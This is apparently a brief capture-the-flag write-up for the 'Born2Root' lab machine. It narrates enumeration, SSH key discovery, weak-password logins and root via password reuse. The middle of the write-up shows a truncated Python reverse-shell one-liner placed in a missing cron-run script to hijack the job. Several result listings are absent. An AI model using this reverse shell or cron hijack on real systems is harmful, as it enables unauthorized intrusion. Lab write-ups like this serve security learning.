BORN2ROOT — Offensive Security
Offensive Security Proving Ground Complete Write-up
Exporting IP of the target machine as environment variable and scanned the target and found open ports and services as:
After switching up to port 80, three users found as martin, hadi, jimmy. COOL!!
After busting the directories with wfuzz, the results are
After hoping to icons directories and enumerating all the files , there’s was a file having ssh key
AWESOME!!, so we got three users, after trying with martin with password secret lab, it was a successful login
Enumerating the martin’s machine and found that in crontab,the file sekurity.py is running every five minutes which itself is missing in /tmp
So i created the same file name with reverse shell payload
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.0.0.0",0000));
with my knife listening on my root machine and yes, it was a good to go!
Enumerating the machine and found nothing special and only user left is hadi, so tried with hadi and with normal password of hadi123 and guess it worked!!!!
Enumerating the machine and after switching user with su command i tried with same password and was a successful login,
Clearly we are now root!!!
That’s all for now!!
Until Next Time,
For any query, catch me on: